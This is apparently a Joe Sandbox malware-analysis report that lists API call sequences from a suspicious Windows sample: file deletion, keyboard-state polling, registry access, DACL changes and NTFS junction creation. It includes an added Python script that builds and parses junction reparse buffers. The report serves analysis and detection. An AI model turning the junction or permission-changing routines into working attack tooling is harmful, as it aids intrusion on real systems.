                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: Close$ConnectCreateRegistryValue
                                                                • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                • API String ID: 536824911-966354055
                                                                • Opcode ID: 9e3a0334a913eb8d8a291add86589652c4d466dea8b2e092176e3731b31fc359
                                                                • Instruction ID: dbb9c598dbd55ece40e163167d3897ca99b3ac4bade713a1f1f79c675e0bbdf6
                                                                • Opcode Fuzzy Hash: 9e3a0334a913eb8d8a291add86589652c4d466dea8b2e092176e3731b31fc359
                                                                • Instruction Fuzzy Hash: F50226756046019FCB14EF18C995F6AB7E5BFC9324F048958F88A9B2A2CB70ED45CF81
                                                                APIs
                                                                • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 0099F113
                                                                • _wcscmp.LIBCMT ref: 0099F128
                                                                • _wcscmp.LIBCMT ref: 0099F13F
                                                                  • Part of subcall function 00994385: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 009943A0
                                                                • FindNextFileW.KERNEL32(00000000,?), ref: 0099F16E
                                                                • FindClose.KERNEL32(00000000), ref: 0099F179
                                                                • FindFirstFileW.KERNEL32(*.*,?), ref: 0099F195
                                                                • _wcscmp.LIBCMT ref: 0099F1BC
                                                                • _wcscmp.LIBCMT ref: 0099F1D3
                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 0099F1E5
                                                                • SetCurrentDirectoryW.KERNEL32(009E8920), ref: 0099F203
                                                                • FindNextFileW.KERNEL32(00000000,00000010), ref: 0099F20D
                                                                • FindClose.KERNEL32(00000000), ref: 0099F21A
                                                                • FindClose.KERNEL32(00000000), ref: 0099F22C
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                                • String ID: *.*
                                                                • API String ID: 1824444939-438819550
                                                                • Opcode ID: ef4f304cabe1581f37b976ecbdba859149bc8b9d529f35427c87475563481c40
                                                                • Instruction ID: 429cf7518e017c795b89389c58b39f90eff8bc580f11ddc306d1fe37078e56ab
                                                                • Opcode Fuzzy Hash: ef4f304cabe1581f37b976ecbdba859149bc8b9d529f35427c87475563481c40
                                                                • Instruction Fuzzy Hash: 1E31D5365042196ADF24DFA8EC69BEEB7AC9F85364F140271F814E2090DB30DE45DA64
                                                                APIs
                                                                • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0099A20F
                                                                • __swprintf.LIBCMT ref: 0099A231
                                                                • CreateDirectoryW.KERNEL32(?,00000000), ref: 0099A26E
                                                                • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 0099A293
                                                                • _memset.LIBCMT ref: 0099A2B2
                                                                • _wcsncpy.LIBCMT ref: 0099A2EE
                                                                • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0099A323
                                                                • CloseHandle.KERNEL32(00000000), ref: 0099A32E
                                                                • RemoveDirectoryW.KERNEL32(?), ref: 0099A337
                                                                • CloseHandle.KERNEL32(00000000), ref: 0099A341
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                                • String ID: :$\$\??\%s
                                                                • API String ID: 2733774712-3457252023
                                                                • Opcode ID: 9d352782e8dde5081853f8d05b8522bf28739b23d654d857660900b194ce29b4
                                                                • Instruction ID: 6f9c2b09f6ab6740d690e273189173e12718d823349ce8cdfbdde656f8b1c504
                                                                • Opcode Fuzzy Hash: 9d352782e8dde5081853f8d05b8522bf28739b23d654d857660900b194ce29b4
                                                                • Instruction Fuzzy Hash: E931BEB290410AABDF21DFA4DC4AFEB37BCEF89751F1041B6F908D2160EB7096448B65
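The call sequence above is the canonical way to create an NTFS directory junction: CreateDirectoryW, then CreateFileW on that directory with GENERIC_WRITE (0x40000000) and dwFlagsAndAttributes 0x02200000, which is FILE_FLAG_BACKUP_SEMANTICS | FILE_FLAG_OPEN_REPARSE_POINT, then DeviceIoControl with control code 0x000900A4, which decodes to FSCTL_SET_REPARSE_POINT, with the "\??\%s" string supplying the NT-form substitute name; RemoveDirectoryW is the cleanup path when the IOCTL fails. Given the report's AutoIt detection this is consistent with the runtime's NTFS-link support, but that attribution is an inference, not something the listing states. The script below is an added example, not code from the sample or from AutoIt: it decodes the control code and the CreateFileW flags, and builds and parses the REPARSE_DATA_BUFFER that such a call sends, so the structure can be recognised when it turns up in a memory dump or an FSCTL trace. It never touches the file system and runs on any platform.

```python
"""Added example: decode the 0x000900A4 control code and build/parse the
mount-point reparse buffer behind the routine at 0099A20F.  Illustrative
code only, not copied from the sample or from the AutoIt runtime.
"""
import struct

# CTL_CODE(DeviceType, Function, Method, Access) layout from winioctl.h:
#   DeviceType << 16 | Access << 14 | Function << 2 | Method
FILE_DEVICE_FILE_SYSTEM = 0x00000009
METHOD_NAMES = {0: "METHOD_BUFFERED", 1: "METHOD_IN_DIRECT",
                2: "METHOD_OUT_DIRECT", 3: "METHOD_NEITHER"}
ACCESS_NAMES = {0: "FILE_ANY_ACCESS", 1: "FILE_READ_ACCESS",
                2: "FILE_WRITE_ACCESS", 3: "FILE_READ_ACCESS|FILE_WRITE_ACCESS"}
# Function numbers of the reparse-point FSCTLs (winioctl.h).
FSCTL_FUNCTIONS = {41: "FSCTL_SET_REPARSE_POINT", 42: "FSCTL_GET_REPARSE_POINT",
                   43: "FSCTL_DELETE_REPARSE_POINT"}
IO_REPARSE_TAG_MOUNT_POINT = 0xA0000003

# CreateFileW dwFlagsAndAttributes bits present in the listed call.
FILE_FLAG_OPEN_REPARSE_POINT = 0x00200000
FILE_FLAG_BACKUP_SEMANTICS = 0x02000000
CREATE_FLAG_NAMES = {FILE_FLAG_OPEN_REPARSE_POINT: "FILE_FLAG_OPEN_REPARSE_POINT",
                     FILE_FLAG_BACKUP_SEMANTICS: "FILE_FLAG_BACKUP_SEMANTICS"}


def decode_ioctl(code: int) -> dict:
    """Split a DeviceIoControl code into its CTL_CODE fields and name it if known."""
    device = (code >> 16) & 0xFFFF
    access = (code >> 14) & 0x3
    function = (code >> 2) & 0xFFF
    method = code & 0x3
    name = FSCTL_FUNCTIONS.get(function) if device == FILE_DEVICE_FILE_SYSTEM else None
    return {"device": device, "function": function, "method": METHOD_NAMES[method],
            "access": ACCESS_NAMES[access], "name": name}


def decode_create_flags(flags: int) -> list:
    """Name the flag bits this example knows; unknown bits are reported as hex."""
    names = [n for bit, n in sorted(CREATE_FLAG_NAMES.items()) if flags & bit]
    leftover = flags & ~sum(CREATE_FLAG_NAMES)
    if leftover:
        names.append("0x%08X" % leftover)
    return names


def build_mount_point_buffer(target: str) -> bytes:
    """REPARSE_DATA_BUFFER (MountPointReparseBuffer) for a junction to target.

    target is a DOS path such as C:\\Windows; the substitute name is derived
    with the same "\\??\\%s" form the routine formats.
    """
    if len(target) < 2 or target[1] != ":":
        raise ValueError("junction target must be an absolute drive path")
    substitute = ("\\??\\" + target).encode("utf-16-le") + b"\x00\x00"
    print_name = target.encode("utf-16-le") + b"\x00\x00"
    path_buffer = substitute + print_name
    # USHORT SubstituteNameOffset, SubstituteNameLength, PrintNameOffset,
    # PrintNameLength; lengths are in bytes and exclude the terminating NUL.
    name_header = struct.pack("<HHHH", 0, len(substitute) - 2,
                              len(substitute), len(print_name) - 2)
    reparse_data_length = len(name_header) + len(path_buffer)
    # ULONG ReparseTag; USHORT ReparseDataLength; USHORT Reserved
    return (struct.pack("<IHH", IO_REPARSE_TAG_MOUNT_POINT, reparse_data_length, 0)
            + name_header + path_buffer)


def parse_mount_point_buffer(buf: bytes) -> dict:
    """Inverse of build_mount_point_buffer, for buffers recovered from a dump."""
    if len(buf) < 16:
        raise ValueError("buffer too short for a mount point reparse header")
    tag, data_len, _reserved = struct.unpack_from("<IHH", buf, 0)
    if tag != IO_REPARSE_TAG_MOUNT_POINT:
        raise ValueError("not a mount point reparse buffer: tag 0x%08X" % tag)
    sub_off, sub_len, prn_off, prn_len = struct.unpack_from("<HHHH", buf, 8)
    path = buf[16:16 + data_len - 8]
    return {"substitute_name": path[sub_off:sub_off + sub_len].decode("utf-16-le"),
            "print_name": path[prn_off:prn_off + prn_len].decode("utf-16-le")}


if __name__ == "__main__":
    print(decode_ioctl(0x000900A4))
    print(decode_create_flags(0x02200000))
    # Constructed sample target, chosen for illustration only.
    print(parse_mount_point_buffer(build_mount_point_buffer("C:\\Windows")))
```

A junction written this way redirects any path under the new directory to the substitute name, so when you see this sequence in a sample, recover the formatted "\??\" string from the dump to learn where it pointed.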
                                                                APIs
                                                                  • Part of subcall function 00988202: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 0098821E
                                                                  • Part of subcall function 00988202: GetLastError.KERNEL32(?,00987CE2,?,?,?), ref: 00988228
                                                                  • Part of subcall function 00988202: GetProcessHeap.KERNEL32(00000008,?,?,00987CE2,?,?,?), ref: 00988237
                                                                  • Part of subcall function 00988202: HeapAlloc.KERNEL32(00000000,?,00987CE2,?,?,?), ref: 0098823E
                                                                  • Part of subcall function 00988202: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00988255
                                                                  • Part of subcall function 0098829F: GetProcessHeap.KERNEL32(00000008,00987CF8,00000000,00000000,?,00987CF8,?), ref: 009882AB
                                                                  • Part of subcall function 0098829F: HeapAlloc.KERNEL32(00000000,?,00987CF8,?), ref: 009882B2
                                                                  • Part of subcall function 0098829F: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00987CF8,?), ref: 009882C3
                                                                • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00987D13
                                                                • _memset.LIBCMT ref: 00987D28
                                                                • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00987D47
                                                                • GetLengthSid.ADVAPI32(?), ref: 00987D58
                                                                • GetAce.ADVAPI32(?,00000000,?), ref: 00987D95
                                                                • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00987DB1
                                                                • GetLengthSid.ADVAPI32(?), ref: 00987DCE
                                                                • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00987DDD
                                                                • HeapAlloc.KERNEL32(00000000), ref: 00987DE4
                                                                • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00987E05
                                                                • CopySid.ADVAPI32(00000000), ref: 00987E0C
                                                                • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00987E3D
                                                                • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00987E63
                                                                • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00987E77
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                • String ID:
                                                                • API String ID: 3996160137-0
                                                                • Opcode ID: c2f715d42fba4f6c340e3599047ca61744da670cc5945665d6e462a8adad6d58
                                                                • Instruction ID: 60ace3383ccd371b724b92f2a38d22e707c8d860b88eac6956d4883ff87f0d71
                                                                • Opcode Fuzzy Hash: c2f715d42fba4f6c340e3599047ca61744da670cc5945665d6e462a8adad6d58
                                                                • Instruction Fuzzy Hash: 4E613B71904209AFDF00EFA4DC95AEEBB79FF48310F148269F915A62A1DB31DA05DB60
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)
                                                                • API String ID: 0-4052911093
                                                                • Opcode ID: bca497869d7d0ef62c8b2f674be416c346548dbaec347ceaaa5c326ef55572cb
                                                                • Instruction ID: 28fa9cab968a6486df82516acccf80ff7523a28541ac58ff60b61e5b4d1886bb
                                                                • Opcode Fuzzy Hash: bca497869d7d0ef62c8b2f674be416c346548dbaec347ceaaa5c326ef55572cb
                                                                • Instruction Fuzzy Hash: B97283B1E04219DBDB24DF59C880BAEB7B9FF49310F14816AE945EB390E7349D81CB91
                                                                APIs
                                                                • GetKeyboardState.USER32(?), ref: 00990097
                                                                • SetKeyboardState.USER32(?), ref: 00990102
                                                                • GetAsyncKeyState.USER32(000000A0), ref: 00990122
                                                                • GetKeyState.USER32(000000A0), ref: 00990139
                                                                • GetAsyncKeyState.USER32(000000A1), ref: 00990168
                                                                • GetKeyState.USER32(000000A1), ref: 00990179
                                                                • GetAsyncKeyState.USER32(00000011), ref: 009901A5
                                                                • GetKeyState.USER32(00000011), ref: 009901B3
                                                                • GetAsyncKeyState.USER32(00000012), ref: 009901DC
                                                                • GetKeyState.USER32(00000012), ref: 009901EA
                                                                • GetAsyncKeyState.USER32(0000005B), ref: 00990213
                                                                • GetKeyState.USER32(0000005B), ref: 00990221
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: State$Async$Keyboard
                                                                • String ID:
                                                                • API String ID: 541375521-0
                                                                • Opcode ID: 8d519c3f5025b48ec8b128982446eef152c6a38ae5ce073d60c120e4b0e6a6c6
                                                                • Instruction ID: 7bec47719674643c79a44cc94e04ec34a6d1a4f9236bf0d4b89618ebd2e8460d
                                                                • Opcode Fuzzy Hash: 8d519c3f5025b48ec8b128982446eef152c6a38ae5ce073d60c120e4b0e6a6c6
                                                                • Instruction Fuzzy Hash: CD51EB209087882DFF35DBA888557FABFBC9F81380F08459ED5D2571C2DAA49B8CC761
                                                                APIs
                                                                  • Part of subcall function 009B0E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,009AFDAD,?,?), ref: 009B0E31
                                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 009B04AC
                                                                  • Part of subcall function 00939837: __itow.LIBCMT ref: 00939862
                                                                  • Part of subcall function 00939837: __swprintf.LIBCMT ref: 009398AC
                                                                • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 009B054B
                                                                • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 009B05E3
                                                                • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 009B0822
                                                                • RegCloseKey.ADVAPI32(00000000), ref: 009B082F
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                                • String ID:
                                                                • API String ID: 1240663315-0
                                                                • Opcode ID: 648e89bc7495adec872ebc79749b4c26314fd86a85eb012e509249b11259f969
                                                                • Instruction ID: 5e00f573315573bc31ce8b4231526652ea7113d2092f433b7e91e2d08fe12a59
                                                                • Opcode Fuzzy Hash: 648e89bc7495adec872ebc79749b4c26314fd86a85eb012e509249b11259f969
                                                                • Instruction Fuzzy Hash: 4EE15D71604200AFCB14DF68C995E6BBBE9EFC9724F04896DF849DB261DA31E901CF91
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                • String ID:
                                                                • API String ID: 1737998785-0
                                                                • Opcode ID: 4136c5025d9f27fcc5a2e6a74b7179b2c8ae3c4ac6f47b8257d9f146a736d2b4
                                                                • Instruction ID: f9a41f6aacae975dfb76d68e80c360d7bbec9c6741b9443d5f6708bd8a6ea1a5
                                                                • Opcode Fuzzy Hash: 4136c5025d9f27fcc5a2e6a74b7179b2c8ae3c4ac6f47b8257d9f146a736d2b4
                                                                • Instruction Fuzzy Hash: 7021BC35204214DFDB00AF24ED19B6A7BA8FF95321F00812AFD469B2A1DBB0AC00DF84
                                                                APIs
                                                                  • Part of subcall function 00934750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00934743,?,?,009337AE,?), ref: 00934770
                                                                  • Part of subcall function 00994A31: GetFileAttributesW.KERNEL32(?,0099370B), ref: 00994A32
                                                                • FindFirstFileW.KERNEL32(?,?), ref: 009938A3
                                                                • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 0099394B
                                                                • MoveFileW.KERNEL32(?,?), ref: 0099395E
                                                                • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 0099397B
                                                                • FindNextFileW.KERNEL32(00000000,00000010), ref: 0099399D
                                                                • FindClose.KERNEL32(00000000,?,?,?,?), ref: 009939B9
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                                                                • String ID: \*.*
                                                                • API String ID: 4002782344-1173974218
                                                                • Opcode ID: 29fe8287a2d91351dfc1f2dbd36ba460c4563c916deebf02bb7ad054d5e93641
                                                                • Instruction ID: 2b9bdc9778186528a68034d7f0f822af9bd479072d4ccd1c6729752f62fe8a9b
                                                                • Opcode Fuzzy Hash: 29fe8287a2d91351dfc1f2dbd36ba460c4563c916deebf02bb7ad054d5e93641
                                                                • Instruction Fuzzy Hash: 27518C3180514CEACF15EFA4CA92AFDB778AF54300F608169E406B7191EB316F09CF61
                                                                APIs
                                                                  • Part of subcall function 00937DE1: _memmove.LIBCMT ref: 00937E22
                                                                • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 0099F440
                                                                • Sleep.KERNEL32(0000000A), ref: 0099F470
                                                                • _wcscmp.LIBCMT ref: 0099F484
                                                                • _wcscmp.LIBCMT ref: 0099F49F
                                                                • FindNextFileW.KERNEL32(?,?), ref: 0099F53D
                                                                • FindClose.KERNEL32(00000000), ref: 0099F553
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                                                                • String ID: *.*
                                                                • API String ID: 713712311-438819550
                                                                • Opcode ID: 6ba2ec9d92575ac7bd5c42746d9788b79df854b5381ad6a350d60c68a3615965
                                                                • Instruction ID: db14594a2c008d04f5dfafa599d59c14677b59b06feb6fb048504e5eaf8a5853
                                                                • Opcode Fuzzy Hash: 6ba2ec9d92575ac7bd5c42746d9788b79df854b5381ad6a350d60c68a3615965
                                                                • Instruction Fuzzy Hash: 9D416D7190421A9BCF14DFA8CC59AFEBBB8FF44310F144566F819A3291EB309A44CF61
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: _memmove
                                                                • String ID:
                                                                • API String ID: 4104443479-0
                                                                • Opcode ID: a9e4835836f1465f98df5d4c900174aa64c7f5a49106cc543b6d7623ef2ba143
                                                                • Instruction ID: 7dc887e04f8b9c45c947899d0a1f98f55d210af1a5d9d312d3109a9bf43c9f4b
                                                                • Opcode Fuzzy Hash: a9e4835836f1465f98df5d4c900174aa64c7f5a49106cc543b6d7623ef2ba143
                                                                • Instruction Fuzzy Hash: BA126A70A00609DFDF14DFA5D981AEEB7F5FF88300F214529E846A7291EB36AD19CB50
                                                                APIs
                                                                  • Part of subcall function 00934750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00934743,?,?,009337AE,?), ref: 00934770
                                                                  • Part of subcall function 00994A31: GetFileAttributesW.KERNEL32(?,0099370B), ref: 00994A32
                                                                • FindFirstFileW.KERNEL32(?,?), ref: 00993B89
                                                                • DeleteFileW.KERNEL32(?,?,?,?), ref: 00993BD9
                                                                • FindNextFileW.KERNEL32(00000000,00000010), ref: 00993BEA
                                                                • FindClose.KERNEL32(00000000), ref: 00993C01
                                                                • FindClose.KERNEL32(00000000), ref: 00993C0A
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                                • String ID: \*.*
                                                                • API String ID: 2649000838-1173974218
                                                                • Opcode ID: a0783e3c5b5a439548b956c7492d71dd7e901178712ef09f2cc809354e931287
                                                                • Instruction ID: 619704c32a6f97556b2e58550cbd6dae157f4950b5dc29653bbbc48d59bf99e6
                                                                • Opcode Fuzzy Hash: a0783e3c5b5a439548b956c7492d71dd7e901178712ef09f2cc809354e931287
                                                                • Instruction Fuzzy Hash: 1931A03101C384ABCB01EF68C8919AFB7ECAE95314F444E2DF4D593191EB20DA08CB63
                                                                APIs
                                                                  • Part of subcall function 009887E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0098882B
                                                                  • Part of subcall function 009887E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00988858
                                                                  • Part of subcall function 009887E1: GetLastError.KERNEL32 ref: 00988865
                                                                • ExitWindowsEx.USER32(?,00000000), ref: 009951F9
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmp
